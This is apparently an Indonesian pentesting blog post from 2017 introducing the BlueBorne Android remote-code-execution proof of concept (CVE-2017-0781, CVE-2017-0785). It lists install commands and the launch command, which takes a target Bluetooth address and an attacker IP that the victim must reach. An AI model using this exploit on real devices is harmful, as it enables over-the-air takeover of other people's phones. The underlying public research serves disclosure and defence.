Pentesting Tools, Tutorial, and Information Technology

Kamis, 02 November 2017

BlueBorne: BlueBorne Android Exploit





Repositori ini berisi kode PoC kerentanan Blue Reed Android RCE (CVE-2017-0781). dan juga menggunakan kerentanan kebocoran informasi SDP (CVE-2017-0785) untuk memotong ASLR. Ini mencapai eksekusi kode pada smartphone Android Google Pixel yang menjalankan versi 7.1.2 dengan Security Patch Level Juli atau Agustus 2017. Kode ini juga dapat diubah sedikit untuk menargetkan smartphone Android lainnya.
Semua kode bisa ditemukan di dalam direktori android.


untuk informasi lebih jelas bisa anda kunjungi situs ini
https://www.armis.com/blueborne/
https://www.armis.com/blueborne-on-android-exploiting-rce-over-the-air/



Installation
# sudo apt-get install libbluetooth-dev
#  sudo pip2 install pybluez pwn
# git clone https://github.com/ArmisSecurity/blueborne.git 

Menjalankan Tools 
# sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>


IP harus diakses oleh korban


Source: https://github.com/ArmisSecurity/blueborne

Tidak ada komentar:

Posting Komentar